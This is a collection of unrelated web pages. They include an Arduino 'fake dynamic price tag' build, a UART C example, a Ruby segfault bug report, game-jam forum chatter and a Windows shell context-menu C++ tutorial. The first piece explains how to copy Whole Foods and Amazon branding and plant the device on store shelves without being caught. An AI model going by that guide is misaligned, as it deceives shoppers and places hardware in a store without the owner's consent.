After that, printing the custom characters is as simple as using lcd.write() with the appropriate bytes. I wrote a helper function to print a range of bytes, and defined printTrademark() in terms of it:

    void writeRawByteRange(uint8_t line, uint8_t col, uint8_t startValue, size_t numBytes)
    {
        for (uint8_t i = 0; i < numBytes; i++)
        {
            lcd.setCursor(col + i, line);
            // need to use write(), not print() - print will turn the integer
            // value into a string and print *that*
            lcd.write(startValue + i);
        }
    }

    void printTrademark(uint8_t line, uint8_t col)
    {
        writeRawByteRange(line, col, firstTrademarkCharByte, trademarkCharCount);
    }

The Amazon arrow logo was treated in a similar way. See the attached code for full details.

Step 4: Code: Niceties

To make things a little easier on myself, I added a few niceties to the code. This includes things like a function for clearing a specific line by overwriting it with spaces, and a function for centering a given string on a line. I also wanted the display to cycle through three distinct phases:

- "Dynamic Pricing" with the logo below
- "by Amazon" with the logo below
- random price display

For that, I built a simple system that keeps track of how long a given phase has been active and, after a certain period, moves on to the next one.
See the attached code for all the gory details!

Step 5: The Box

Now, so we don't get the bomb squad called on us, let's make a nice box for the whole thing. We'll be doing this with laser-cut acrylic. There are a lot of online tools for jump-starting the process of making simple boxes. I recommend makercase.com, since it lets you specify the inner dimensions and accounts for the thickness of the material. We measured the Arduino, LCD and 9V battery, and estimated that we'd be able to fit it all in a case that was 4" x 2.5" x 2". So we plugged those numbers into makercase, with 1/8" thick acrylic. We modified the resulting PDF to add a rounded window for the LCD, and a slot along the bottom for a display tag (more on that later). The resulting file is attached as a PDF.

We used acrylic adhesive (the toxic methyl ethyl ketone kind) to assemble four sides of the box. Then we attached the LCD panel to the front with hot glue. Once we had everything working and fitting, we sealed the last two sides of the box with hot glue, so that we could easily take it apart later. Since we weren't expecting the device to receive much wear and tear, we left the Arduino and battery unsecured on the bottom of the case.

Potential Improvements

- We neglected to build in any way to turn the device on or off. Ha. Room for a switch on the bottom or back of the box would have been a good idea.
- The slot along the bottom for the hanging tag could have been closer to the front of the box, for improved visibility.

Step 6: Blending In

And now, the hard part: sneaking it into a store.
Whole Foods branding

Some things we learned in reverse-engineering Whole Foods and Amazon branding:

- Body text is generally in Scala Sans
- Header text is in something that looks a lot like Brighton – one of those generic "warm and friendly" fonts
- Whole Foods green is something close to #223323
- Stake out your local store for examples of graphic elements that repeat: they're fond of scalloped borders, sunbursts, and simple vector art.

The hanging tag

We cut a slit in the bottom of the acrylic case so that we could attach a hanging tag to the box, explaining what's going on. See the attached PDF for an example. This is designed to be cut out and inserted into the slot; it should fit and hold without any adhesive.

Shelving

As for actually attaching the box to a shelf, Whole Foods uses pretty standard shelving components. We took measurements and found a compatible hook in a hardware store. We affixed the box to the hook with hot glue. If you can't find such a hook, you could try magnets – glue some to the back of the box, and just snap it onto a shelf.

Deploy!

Place the box at eye level to attract the attention of passersby. Don't get caught! Best of luck!

2 Discussions

Impressive work! You might want to add a line "get more information on dynamic pricing at ..." if you want customers to know what is going on.

Interesting! Did the store ever catch you and kick you out, or were they cool with this?
https://www.instructables.com/id/Fake-Dynamic-Price-Tag/
Programming Serial (UART) in C or C++

- Maximilian Gerhardt: @Arun-Kapur Using the UART on the Omega2 should be like using any other Linux UART device. For starters, use the program screen or miniterm.py (opkg install python-pyserial) to use the device /dev/ttyS1 for UART1. For C code, search e.g. "linux C uart" or "linux C serial port" or see . Documentation is present from the Onion team. That's the first Google result for "Omega2 UART".

- Arun Kap!

- William Scott .

- Chris Stratton: @William-Scott said in Programming Serial(UART) in C or C++: . In actuality, correctly using the Omega's UART is a bit complex, requiring quite a bit of configuration, especially as the defaults are a bit unusual and less appropriate than on many other systems.

@Chris-Stratton Would you be able to share any example code? @Maximilian.

- Maximilian Gerhardt:

    #include <errno.h>
    #include <fcntl.h>
    #include <string.h>
    #include <termios.h>
    #include <unistd.h>
    #include <stdlib.h>
    #include <stdint.h>
    #include <stdio.h>

    int set_interface_attribs(int fd, int speed, int parity)
    {
        struct termios tty;
        memset(&tty, 0, sizeof tty);
        if (tcgetattr(fd, &tty) != 0) {
            fprintf(stderr, "error %d from tcgetattr", errno);
            return -1;
        }

        cfsetospeed(&tty, speed);
        cfsetispeed(&tty, speed);

        tty.c_cflag = (tty.c_cflag & ~CSIZE) | CS8; // 8-bit chars
        // disable IGNBRK for mismatched speed tests; otherwise receive break
        // as \000 chars
        tty.c_iflag &= ~IGNBRK;  // disable break processing
        tty.c_lflag = 0;         // no signaling chars, no echo,
                                 // no canonical processing
        tty.c_oflag = 0;         // no remapping, no delays
        tty.c_cc[VMIN] = 0;      // read doesn't block
        tty.c_cc[VTIME] = 5;     // 0.5 seconds read timeout

        tty.c_iflag &= ~(IXON | IXOFF | IXANY); // shut off xon/xoff ctrl

        tty.c_cflag |= (CLOCAL | CREAD);   // ignore modem controls,
                                           // enable reading
        tty.c_cflag &= ~(PARENB | PARODD); // shut off parity
        tty.c_cflag |= parity;
        tty.c_cflag &= ~CSTOPB;
        tty.c_cflag &= ~CRTSCTS;

        if (tcsetattr(fd, TCSANOW, &tty) != 0) {
            fprintf(stderr, "error %d from tcsetattr", errno);
            return -1;
        }
        return 0;
    }

    void set_blocking(int fd, int should_block)
    {
        struct termios tty;
        memset(&tty, 0, sizeof tty);
        if (tcgetattr(fd, &tty) != 0) {
            fprintf(stderr, "error %d from tcgetattr", errno);
            return;
        }

        tty.c_cc[VMIN] = should_block ? 1 : 0;
        tty.c_cc[VTIME] = 5; // 0.5 seconds read timeout

        if (tcsetattr(fd, TCSANOW, &tty) != 0)
            fprintf(stderr, "error %d setting term attributes", errno);
    }

    /* use omega UART1 */
    const char *portname = "/dev/ttyS1";
    int uartFd = -1;

    void uart_writestr(const char *string)
    {
        write(uartFd, string, strlen(string));
    }

    void uart_write(void *data, size_t len)
    {
        write(uartFd, data, len);
    }

    ssize_t uart_read(void *buffer, size_t charsToRead)
    {
        return read(uartFd, buffer, charsToRead);
    }

    int uart_open(const char *port, int baud, int blocking)
    {
        uartFd = open(port, O_RDWR | O_NOCTTY | O_SYNC);
        if (uartFd < 0) {
            fprintf(stderr, "error %d opening %s: %s", errno, port, strerror(errno));
            return -1;
        }
        set_interface_attribs(uartFd, baud, 0); // set speed, 8n1 (no parity)
        set_blocking(uartFd, blocking);         // set blocking mode
        printf("Port %s opened.\n", port);
        return 1;
    }

    int main(int argc, char *argv[])
    {
        if (uart_open(portname, B115200, 0) < 0)
            return -1;

        for (int i = 0; i < 10; i++) {
            printf("[+] Writing string to UART.\n");
            uart_writestr("Hello world!\n");
            usleep(1000 * 1000);
        }
        return 0;
    }
http://community.onion.io/topic/2495/programming-serial-uart-in-c-or-c/2
Floating Point Standard Types

In contrast to Integers, Floats are used to represent numerical values that can contain decimals or fractional parts. This makes floats more versatile, but comes with drawbacks such as slower performance than integers and less well-defined precision.

Elements provides two floating point types with different sizes (32 and 64 bits). Unlike with integers, the size does not so much determine the range of numbers that the type can hold, but rather their precision – that is, how many digits of accuracy are provided.

Both float types are defined in the RemObjects.Elements.System namespace – which is in scope by default and does not have to be used/imported manually. However, the namespace name can be used to prefix the type names, where necessary, to avoid ambiguities. In addition to the type core names and their aliases, C# also provides the float and double keywords to refer to these same types. Swift also defines additional aliases in the Swift namespace via the Swift Base Library.

Probably the most commonly used floating point type is Double.

See Also

- Integers
- Floating Point Numbers on Wikipedia
https://docs.elementscompiler.com/API/StandardTypes/Floats/
20 January 2012 08:48 [Source: ICIS news]

(adds updates from paragraph 8 onwards)

SINGAPORE (ICIS)--

The plant will be operated by ABT, which is a fully owned subsidiary of Vinythai, the source added. Production at the new plant will undergo various quality control checks and a series of approval processes for about a month, the source said.

"If everything goes according to schedule, we expect to start offering by the end of February," the source added.

Solvay's in-house Epicerol technology, which requires glycerine as a feedstock to produce ECH, will be used at the new plant, the source said. According to market sources, the facility will use 110,000 tonnes/year of refined glycerine.

Solvay holds a 59% stake in Vinythai, while PTTGC and General Public hold a 25% and a 16% share, respectively.

News of the plant start-up has led players in the glycerine market to expect the region's spot supply to tighten, which may boost the prices of refined glycerine, market sources said. The prices may rise in the near term after the plant is started up because of the possibly lower supply available in the spot market, according to a regular buyer in southeast Asia.

"Although [Solvay] is buying [refined glycerine] mostly on a contract basis, there will still be some impact on the spot market because its requirements are significant," a southeast Asian trader said.

However, Solvay is expecting minimal impact on the spot market, especially in the near term, a company source said. "We have contracted most of our glycerine demand," said the source, who added that the company will not operate the plant at full capacity immediately after bringing it on stream, hence its lower requirement.

Additional reporting by Wong Lei Lei
http://www.icis.com/Articles/2012/01/20/9525548/vinythais-new-ech-unit-to-tighten-glycerine-stock-up-prices.html
import "acln.ro/ioctl"

Package ioctl provides facilities to define ioctl numbers and perform ioctls against file descriptors. See the documentation at.

For the time being, package ioctl is only tested and used on amd64 and arm (thanks to @tv42), but it should work on other architectures too, based on my (admittedly rather cursory) reading of Linux header files. Please file a bug if the numbers are wrong for your architecture.

Package ioctl is pure Go, but running tests requires a C compiler and the appropriate C headers. See internal/cgoioctl.

Package ioctl presents itself as a Go module. The current version is v0.9.0.

Package ioctl is distributed under the ISC license. A copy of the license can be found in the LICENSE file.
https://search.gocenter.io/acln.ro/ioctl
Backport #9168 (closed)

Segfault with Sync_m, Queue, and garbage collection

Description

=begin
I am able to reliably generate a segmentation fault when using Sync_m & Queue together. The issue appears garbage collection related as well, as if I (({GC.disable})) the issue goes away.

This is the bottom of the output generated by the script and the top of the debug output (the full thing is in the attachment):

    ...
    ...
    ...
    Starting 1766
    Starting 1767
    Starting 1768
    Starting 1769
    Finalizing 1187
    Finalizing 1188
    Finalizing 1189
    Finalizing 1190
    Finalizing 1186
    Finalizing 1191
    Finalizing 1192
    Finalizing 1193
    Finalizing 1195
    Finalizing 1196
    Finalizing 1197
    Finalizing 1198
    Finalizing 1194
    Finalizing 1199
    Finalizing 1200
    Finalizing 1201
    /usr/lib64/ruby/2.0.0/thread.rb:187: [BUG] Segmentation fault
    ruby 2.0.0p353 (2013-11-22 revision 43784) [x86_64-linux]

    -- Control frame information -----------------------------------------------
    c:0005 p:0028 s:0016 e:000015 METHOD /usr/lib64/ruby/2.0.0/thread.rb:187
    c:0004 p:0083 s:0012 e:000011 BLOCK /tmp/test.rb:22 [FINISH]
    c:0003 p:---- s:0008 e:000007 CFUNC :times
    c:0002 p:0055 s:0005 E:001f80 EVAL /tmp/test.rb:16 [FINISH]
    c:0001 p:0000 s:0002 E:001dc8 TOP [FINISH]

    /tmp/test.rb:16:in `<main>'
    /tmp/test.rb:16:in `times'
    /tmp/test.rb:22:in `block in <main>'
    /usr/lib64/ruby/2.0.0/thread.rb:187:in `pop'

    -- C level backtrace information -------------------------------------------
    /usr/lib64/libruby20.so.2.0(+0x1c1f3f) [0x7fc0ee2d9f3f] vm_dump.c:647
    /usr/lib64/libruby20.so.2.0(+0x66a1e) [0x7fc0ee17ea1e] error.c:283
    /usr/lib64/libruby20.so.2.0(rb_bug+0xe7) [0x7fc0ee17eb3b] error.c:302
    /usr/lib64/libruby20.so.2.0(+0x13a406) [0x7fc0ee252406] signal.c:672
    /lib64/libc.so.6(+0x38270) [0x7fc0edda0270]
    /usr/lib64/libruby20.so.2.0(+0x1bdf17) [0x7fc0ee2d5f17] vm.c:1234
    /usr/lib64/libruby20.so.2.0(+0x1bc767) [0x7fc0ee2d4767] vm.c:648
    /usr/lib64/libruby20.so.2.0(+0x1bc896) [0x7fc0ee2d4896] vm.c:679
    /usr/lib64/libruby20.so.2.0(+0x1b8e67) [0x7fc0ee2d0e67] vm_eval.c:930
    /usr/lib64/libruby20.so.2.0(rb_yield+0x38) [0x7fc0ee2d0ea1] vm_eval.c:940
    /usr/lib64/libruby20.so.2.0(+0xc1d82) [0x7fc0ee1d9d82] numeric.c:3588
    /usr/lib64/libruby20.so.2.0(+0x1a91a5) [0x7fc0ee2c11a5] vm_insnhelper.c:1336
    /usr/lib64/libruby20.so.2.0(+0x1a9d2a) [0x7fc0ee2c1d2a] vm_insnhelper.c:1474
    /usr/lib64/libruby20.so.2.0(+0x1a9e37) [0x7fc0ee2c1e37] vm_insnhelper.c:1564
    /usr/lib64/libruby20.so.2.0(+0x1aa898) [0x7fc0ee2c2898] vm_insnhelper.c:1758
    /usr/lib64/libruby20.so.2.0(+0x1ab0e5) [0x7fc0ee2c30e5] vm_insnhelper.c:1916
    /usr/lib64/libruby20.so.2.0(+0x1ae8b9) [0x7fc0ee2c68b9] insns.def:1002
    /usr/lib64/libruby20.so.2.0(+0x1bdcd9) [0x7fc0ee2d5cd9] vm.c:1201
    /usr/lib64/libruby20.so.2.0(rb_iseq_eval_main+0x34) [0x7fc0ee2d6b22] vm.c:1449
    /usr/lib64/libruby20.so.2.0(+0x6c4dc) [0x7fc0ee1844dc] eval.c:250
    /usr/lib64/libruby20.so.2.0(ruby_exec_node+0x24) [0x7fc0ee1845f5] eval.c:315
    /usr/lib64/libruby20.so.2.0(ruby_run_node+0x3e) [0x7fc0ee1845c8] eval.c:307
    ruby() [0x400ac9]
    /lib64/libc.so.6(__libc_start_main+0xf5) [0x7fc0edd8c6f5]
    ruby() [0x400969]

And this is the script which can reproduce the issue:

    #!/usr/bin/ruby
    require 'thread'
    require 'sync'

    def finalizer(queues, i)
      proc do
        puts "Finalizing #{i}"
        queues.synchronize(:EX) do
          queues.delete(i)
        end
      end
    end

    queues = {}
    queues.extend(Sync_m)

    10000.times do |i|
      puts "Starting #{i}"
      queue = Queue.new
      queues[i] = queue
      ObjectSpace.define_finalizer(Object.new, finalizer(queues, i))
      queue << nil
      queue.pop
    end

This was as simple a test case as I could create. In the finalizer, if you just call (({queues.delete()})) without the (({queues.synchronize()})), the issue does not occur. The issue appears new to 2.0.0.
I could not duplicate it with 1.9.3p448.
=end

Files

Updated by Glass_saga (Masaki Matsushita) over 8 years ago

- Category set to core
- Status changed from Open to Assigned
- Target version set to 2.1.0
- Backport changed from 1.9.3: UNKNOWN, 2.0.0: UNKNOWN to 1.9.3: DONTNEED, 2.0.0: REQUIRED

I wrote minimal code.

    raise_proc = proc do
      raise
    end

    10000.times do
      ObjectSpace.define_finalizer(Object.new, raise_proc)
      Thread.handle_interrupt(RuntimeError => :immediate) do
        # SEGV is caused in :on_blocking and :never too.
        break
      end
    end

Updated by tarui (Masaya Tarui) over 8 years ago

- Status changed from Assigned to Open
- Priority changed from Normal to 5

I think that this is serious. I checked what happens in the error case.

- By break, throwobj is set to th->errinfo in the throw RubyVM instruction.
- In rb_thread_s_handle_interrupt, throwobj is trapped (TAG), and the finalizer is called via RUBY_VM_CHECK_INTS(th) before JUMP_TAG.
- In the finalizer, th->errinfo is used by raise.

Updated by apoc (Matthias Hecker) over 8 years ago

I'm writing because I think I encountered that bug in the ruby IRC bot rbot: the stacktrace looks very similar, and the crash only happens after a few hours. rbot is using Queue (and Mutex to synchronize). I can reproduce the bug with the script provided. Also using 2.0.0p353; the bot works fine in 1.9.3.

Updated by nobu (Nobuyoshi Nakada) over 8 years ago

- Status changed from Open to Closed
- % Done changed from 0 to 100

This issue was solved with changeset r44260. Patrick, thank you for reporting this issue. Your contribution to Ruby is greatly appreciated. May Ruby be with you.

vm_trace.c: isolate exceptions

- vm_trace.c (rb_postponed_job_flush): isolate exceptions in postponed jobs and restore outer ones. based on a patch by tarui.
[ruby-core:58652] [Bug #9168]

Updated by nagachika (Tomoyuki Chikanaga) over 8 years ago

- Tracker changed from Bug to Backport
- Project changed from Ruby master to Backport200
- Category deleted (core)
- Status changed from Closed to Assigned
- Assignee set to nagachika (Tomoyuki Chikanaga)
- Target version deleted (2.1.0)

Updated by nagachika (Tomoyuki Chikanaga) over 8 years ago

Because ruby_2_0_0 doesn't have postponed_job, r44260 cannot be backported to ruby_2_0_0 cleanly. I've made an equivalent patch for ruby_2_0_0. nobu, please review it. Thanks in advance.

Updated by nobu (Nobuyoshi Nakada) over 8 years ago

Why are rb_set_errinfo and direct assignment mixed?

Updated by nagachika (Tomoyuki Chikanaga) over 8 years ago

Thank you for your review.

Why are rb_set_errinfo and direct assignment mixed?

Because rb_set_errinfo() raises an error when the argument is a Fixnum and the state is TAG_BREAK, TAG_FATAL, etc.

Updated by nagachika (Tomoyuki Chikanaga) over 8 years ago

- Status changed from Assigned to Closed
https://bugs.ruby-lang.org/issues/9168
Ready to rock!

Same here: Ready to rock!

12 minutes and counting...

Less than ONE minute!!!

What do we think of them? Easy? Tough? Confusing? I think it's going to be a little more tough than I anticipated. None of the rules have anything to do with my original ideas for a quick game. For example, I don't know anything about pathfinding algorithms.

1. Craftsmanship: The game is centered around crafting items out of components.
1. Include dialog in poetic form (rhymed couplets, limerick, haiku) as much as you can
2. Include snow
1. path finding
2. I

I didn't think that al_draw_text could draw unicode characters? How does it know which encoding to use? Wouldn't it just interpret it as ascii?

UTF8. All of Allegro's strings are UTF8 - so as long as your text editor is set to UTF8 it will work. Other than that you need to be careful though - functions like strlen() or strcat() will work, as all they care about are 0-bytes in the string, and UTF8 is compatible with ASCII there. Other things will not work in general, so there is a point where you will want the al_ustr_* functions instead. But for simple things you don't have to.

Holy crap, I've been coding for about 14 hours straight. Game's coming along pretty smoothly. How you guys holding up?

Everybody goes Japanese. I think I'll go Russian.

That's weird. All I see is my wife's webcam website. I didn't put that webcam. Really!

TINS Update: God, I suck. O_O I've gotten so rusty with game programming and my health problems keep getting in the way. I've only put ~1.5 hours in so far and I need to take a break.

Mid-speedhack crisis is starting to kick in for a few people. It's natural around this time. Things might seem overwhelming at this point, all the things you have planned and no time to do all of them. Don't give up yet! It's a matter of properly scaling your plans. Miran Amon succeeded in creating a second-place entry with just one day of coding.
Elias is still planning to submit with just a few hours of spare time, and I'm hoping he succeeds. Adjust your targets. Anybody can write hangman in 2 hours. With the proper dressing up, you can make hangman fit the rules as well: Hangman is crafting a scaffold. The word you look for is the last word of a poem. It's a poem about finding your path in life. The win / game over message is in Russian. There is a snow particle effect in the background. OK, so it might not be a winning entry. Submitting a complete game is its own reward.

Been following the logs; I'm impressed to see how you guys can do so much in so little time. I got a late start, together with lack of skill and lack of ideas. Gave up after I couldn't get my collision detection right. Good luck to everyone.

I never had time to participate, though I was probably the first to sign up. But here's my rhyme dictionary for anyone who hasn't started with the dialog yet.

Haa yes, that was a good night! Down at 2:22 in the morning, but it works! 3h50 before the end, and still a lot to do!! Keep going guys! Edit: Deadline is soon, I submitted!! Don't wait - give what you have! I did a point'n'click with only one puzzle, but it has all the rules. Did I win yet?

Mark, where can I find allegro_flares.h?

AllegroFlare is my framework/library. You'll need to compile the project from source - I made a 0.8.7.tins release here. The TINS game + allegro_flare will only work with Allegro 5.2.0. If you plan on building, please let me know what problems you run into. I want to make building AllegroFlare as seamless as possible before 1.0. When I put up my game thread, I plan to have builds.

I ran into problems. I stopped for now. Mainly:
- Added #include <stdio.h> and #include <string.h> to include/allegro_flare/attributes.h
- Commented out al_set_new_bitmap_depth in ElementID *ElementIDManager::get_element_by_id(std::string id), line 47 (what does it do here?)
- Added #include <iostream> to include/allegro_flare/clipboard.h

Edit: and obligatorily changed the makefile includes, path error otherwise:

LIBS_ROOT=.
ALLEGRO_DIR=$(LIBS_ROOT)/allegro5
ALLEGRO_LIB_DIR=$(ALLEGRO_DIR)/build/lib
ALLEGRO_FLARE_DIR=./include
ALLEGRO_FLARE_LIB_NAME=allegro_flare-$(ALLEGRO_FLARE_VERSION_STR)
INCLUDE_FLAGS=-I$(ALLEGRO_DIR)/include -I$(ALLEGRO_FLARE_DIR)

Else allegro-flare itself would not compile. See you tomorrow!

> Commented out al_set_new_bitmap_depth in ElementID *ElementIDManager::get_element_by_id(std::string id), line 47 (what does it do here?)

*Smacks self on head* Can't believe I left that in there. Also, that means you're not using Allegro 5.2.0. In order for the game to work it needs features in that version (namely the al_set_new_bitmap_depth()).

> Added #include <iostream> to include/allegro_flare/clipboard.h

Oh, good catch. Actually, that should probably go in source/clipboard_generic.cpp.

I got tied up with personal problems. No entry for me this year. :/

> I got tied up with personal problems. No entry for me this year. :/

:/

I ended up with a bunch of health issues. I put maybe four hours in. Was playing around with a GTA-style game but more puzzle, with trying to drive through obstacles / parking lots without getting in an accident. I haven't given up on it, but I've come to realize how little "free time" I really have even when I'm truly interested in a project.
https://www.allegro.cc/forums/print-thread/616257
This article explains how to use my self-written CShellContextMenu class, which makes it possible to use the shell context menu in your own application (the one that shows if you right-click on an object in the Windows Explorer).

I have a lot of projects in which I work with files/folders, so I wanted to use the common shell context menu for those. Microsoft put a wonderful example of how to achieve this in their Platform SDK, called EnumDesk. But since not all people understand shell interfaces, and the code should be reusable, I wrapped things up in a C++ class. I also did some Google searching to find good ways of implementing this. The class hides all the interface-related stuff; you can either use normal file system paths (e.g. c:\windows) or PIDLs to obtain the shell context menu. So here it is, the CShellContextMenu class, which makes it easy as hell to use the shell context menu.

CShellContextMenu scm;                    // instantiate class object
scm.SetObjects (TEXT ("c:\\"));           // we want the shell context menu for drive c:\
scm.ShowContextMenu (this, point);        // point is a CPoint object which indicates where the
                                          // context menu should be shown; this refers to an MFC
                                          // window class (ShowContextMenu needs that to set the
                                          // owner window)

There's just one other important thing you have to do. In your InitInstance () function of your CWinApp-derived class, insert the following lines of code; that's necessary, otherwise not all shell context menu items would be shown.

// Initialize OLE 2.0 libraries
if (!AfxOleInit ())
{
    AfxMessageBox (TEXT ("Unable to load OLE 2.0 libraries!"));
    return (FALSE);
}

You will also need:

#include <afxole.h> // for OLE

That's all you need to pop up the shell context menu for drive C. CShellContextMenu also supports multiple files/folders.
Just pass a CStringArray to CShellContextMenu::SetObjects () and you'll get a context menu which refers to all the items specified in that array. That corresponds to selecting multiple objects in Windows Explorer and then right-clicking on the selection. Keep in mind that if you pass multiple files/folders/shell objects, they all have to be in the same folder. This is not a limitation of CShellContextMenu, but rather of how the IContextMenu interface is implemented in the Windows Shell. CShellContextMenu also works with PIDLs. If you don't know what PIDLs are, then it won't matter, because CShellContextMenu handles that stuff for you. I would also suggest that you have a look at SetObjects (...) and the other functions to get a better grasp of shell interfaces. The source code is also heavily commented, so with MSDN at hand there shouldn't be any problems.

Let's have an inside look into CShellContextMenu and see what it really does under the hood to obtain that handy shell context menu. First take a look at those SetObjects (...) methods.

void SetObjects (CString strObject);      // one file system path (file/folder)
void SetObjects (CStringArray &strArray); // array of multiple file system paths (files/folders)
void SetObjects (LPITEMIDLIST pidl);      // fully qualified PIDL of shell object
void SetObjects (IShellFolder * psfFolder, LPITEMIDLIST pidlItem);
                                          // relative PIDL and its parent IShellFolder interface
void SetObjects (IShellFolder * psfFolder, LPITEMIDLIST * pidlArray, int nItemCount);
                                          // array of multiple relative PIDLs and their parent
                                          // IShellFolder interface

With SetObjects (...) you tell CShellContextMenu for which objects (file/folder/shell object) you wish to have the context menu. For people who don't know how to handle PIDLs, or if your program just works with usual file system paths, I implemented two overloaded versions of SetObjects (...) that accept a CString or a CStringArray as an argument; CShellContextMenu converts the given file system path(s) into PIDLs and retrieves the corresponding IShellFolder interface. That's necessary because the IContextMenu interface is only accessible via the IShellFolder interface, which only takes PIDLs as arguments. Now let's take an in-depth look at ShowContextMenu, which actually does the work.

UINT CShellContextMenu::ShowContextMenu (CWnd *pWnd, CPoint pt)
{
    int iMenuType = 0;          // to know which version of IContextMenu is supported
    LPCONTEXTMENU pContextMenu; // common pointer to IContextMenu and higher-version interfaces

    if (!GetContextMenu ((void**) &pContextMenu, iMenuType))
        return (0); // something went wrong

    if (!m_Menu)
    {
        m_Menu = new CMenu;
        m_Menu->CreatePopupMenu ();
    }

    // let QueryContextMenu fill our popup menu
    pContextMenu->QueryContextMenu (m_Menu->m_hMenu, m_Menu->GetMenuItemCount (),
                                    MIN_ID, MAX_ID, CMF_EXPLORE);

    // subclass window to handle menu-related messages in CShellContextMenu
    WNDPROC OldWndProc;
    if (iMenuType > 1) // only versions 2 and 3 support menu messages
    {
        OldWndProc = (WNDPROC) SetWindowLong (pWnd->m_hWnd, GWL_WNDPROC, (DWORD) HookWndProc);
        SetProp (pWnd->m_hWnd, TEXT ("OldWndProc"), (HANDLE) OldWndProc); // HookWndProc reads
                                                                          // this back via GetProp
        if (iMenuType == 2)
            g_IContext2 = (LPCONTEXTMENU2) pContextMenu;
        else // version 3
            g_IContext3 = (LPCONTEXTMENU3) pContextMenu;
    }
    else
        OldWndProc = NULL;

    UINT idCommand = m_Menu->TrackPopupMenu (TPM_RETURNCMD | TPM_LEFTALIGN, pt.x, pt.y, pWnd);

    if (OldWndProc) // unsubclass
    {
        SetWindowLong (pWnd->m_hWnd, GWL_WNDPROC, (DWORD) OldWndProc);
        RemoveProp (pWnd->m_hWnd, TEXT ("OldWndProc"));
    }

    // see if the returned idCommand belongs to the shell menu entries
    if (idCommand >= MIN_ID && idCommand <= MAX_ID)
    {
        // execute the related command
        InvokeCommand (pContextMenu, idCommand - MIN_ID);
        idCommand = 0;
    }

    pContextMenu->Release ();
    g_IContext2 = NULL;
    g_IContext3 = NULL;

    return (idCommand);
}

As you can see, ShowContextMenu takes a pointer to a CWnd object and a CPoint object as arguments.
The CWnd pointer is needed for the later subclassing, and CPoint is used to determine at which position the context menu should be shown. Note that these are screen coordinates. So, if you have client coordinates, convert them via ClientToScreen (...) before passing them to ShowContextMenu.

So, what is ShowContextMenu doing? First it calls GetContextMenu (...) to retrieve the IContextMenu interface (which is then stored in pContextMenu) associated with the objects passed to SetObjects (...). GetContextMenu is explained afterwards. What we now have to do is determine which version of IContextMenu we have. That's necessary because if we have an IContextMenu higher than version 1, we need to handle the WM_DRAWITEM, WM_MEASUREITEM and WM_INITMENUPOPUP messages. These messages are sent to the window pointed to by pWnd, which is passed in ShowContextMenu's argument list. That's where window subclassing comes in handy. All we have to do is redirect the window's default window procedure (the function which handles all the messages belonging to a window). With SetWindowLong (...) we set the new window procedure to HookWndProc (...), which is a static member function of CShellContextMenu.

Let's again take a look at the code. After we have a pointer to the IContextMenu interface, we create a popup menu with CMenu's CreatePopupMenu () method. Next, we let IContextMenu's QueryContextMenu (...) method fill our popup menu. This method has five parameters. The first is the handle to the popup menu which should be filled with the shell menu items. The second is the menu position where it starts. This can be useful because, before you let the menu be filled, you can insert additional menu items which are specific to your program. That's what the 3rd and 4th parameters are for: they specify the lowest and highest command IDs that QueryContextMenu (...) should use to fill the menu. That means that command IDs which are below or above that range are free for your own additional menu items. CShellContextMenu has support for adding custom menus. Just call the GetMenu () method to retrieve a CMenu pointer to the popup menu. With this you can customize the menu as you like. After that, go on as usual and call ShowContextMenu (...). The 5th parameter uses the flag CMF_EXPLORE to indicate that we want the same items that Windows Explorer shows in its context menu. Then we subclass pWnd and redirect all messages to HookWndProc (...), but only if the IContextMenu is version 2 or 3. With CMenu's TrackPopupMenu (...) we show the context menu and store the command ID of the selected menu item in idCommand. Then we test whether idCommand is between MIN_ID and MAX_ID; if so, it means that a shell menu item was clicked and not one we manually inserted (btw. those constants are defined in ShellContextMenu.cpp, change them to your needs if you wish to). If it is a shell menu item, we call CShellContextMenu::InvokeCommand (...), which executes the appropriate command belonging to that shell menu item, and release the IContextMenu interface with pContextMenu->Release ().

Here's GetContextMenu, which retrieves the highest version of IContextMenu available for the given objects. m_psfFolder is an IShellFolder interface; via its GetUIObjectOf method we get version 1 of the IContextMenu interface. nItems is the number of objects that were passed to SetObjects (...), and m_pidlArray is an array of PIDLs that are relative to m_psfFolder (the IShellFolder interface). Those PIDLs were also passed to SetObjects (...), or, if you passed file system paths, CShellContextMenu has automatically retrieved the corresponding PIDLs and the IShellFolder interface. If we have a valid IContextMenu interface, we try to get version 3; if that fails we try version 2, and if that too fails we stay with version 1. And that's all.

BOOL CShellContextMenu::GetContextMenu (void ** ppContextMenu, int & iMenuType)
{
    *ppContextMenu = NULL;
    LPCONTEXTMENU icm1 = NULL;

    // first we retrieve the normal IContextMenu
    // interface (every object should have it)
    m_psfFolder->GetUIObjectOf (NULL, nItems, (LPCITEMIDLIST *) m_pidlArray,
                                IID_IContextMenu, NULL, (void**) &icm1);

    if (icm1)
    {
        // since we got an IContextMenu interface, we can
        // now obtain the higher-version interfaces via it
        if (icm1->QueryInterface (IID_IContextMenu3, ppContextMenu) == NOERROR)
            iMenuType = 3;
        else if (icm1->QueryInterface (IID_IContextMenu2, ppContextMenu) == NOERROR)
            iMenuType = 2;

        if (*ppContextMenu)
            icm1->Release (); // we can release the version 1 interface, because we got a higher one
        else
        {
            iMenuType = 1;         // no higher version was found,
            *ppContextMenu = icm1; // so we stay with the version 1 interface
        }
    }
    else
        return (FALSE); // something went wrong

    return (TRUE); // success
}

Next is the alternative window procedure that is only used while the context menu is being shown. HookWndProc checks for menu-related messages and calls IContextMenu's HandleMenuMsg. g_IContext2 and g_IContext3 are global pointers; they point to the IContextMenu2 and IContextMenu3 interfaces of the context menu that is currently being shown. It's necessary to have a global variable because HookWndProc is a static member function, and static member functions have no this pointer, therefore it cannot access its class member variables and functions.
HookWndProc must be static because a non-static member function always has an additional hidden this parameter, and therefore its argument list wouldn't match that of a window procedure. At the end of HookWndProc we call the original WndProc to avoid undefined behaviour of the associated window. The original WndProc is retrieved via the GetProp () API function. Refer to the MSDN for further information on this API function.

LRESULT CALLBACK CShellContextMenu::HookWndProc (HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
    switch (message)
    {
    case WM_MENUCHAR: // only supported by IContextMenu3
        if (g_IContext3)
        {
            LRESULT lResult = 0;
            g_IContext3->HandleMenuMsg2 (message, wParam, lParam, &lResult);
            return (lResult);
        }
        break;

    case WM_DRAWITEM:
    case WM_MEASUREITEM:
        if (wParam)
            break; // if wParam != 0 then the message is not menu-related
        // fall through

    case WM_INITMENUPOPUP:
        if (g_IContext2)
            g_IContext2->HandleMenuMsg (message, wParam, lParam);
        else // version 3
            g_IContext3->HandleMenuMsg (message, wParam, lParam);
        return (message == WM_INITMENUPOPUP ? 0 : TRUE); // inform the caller that
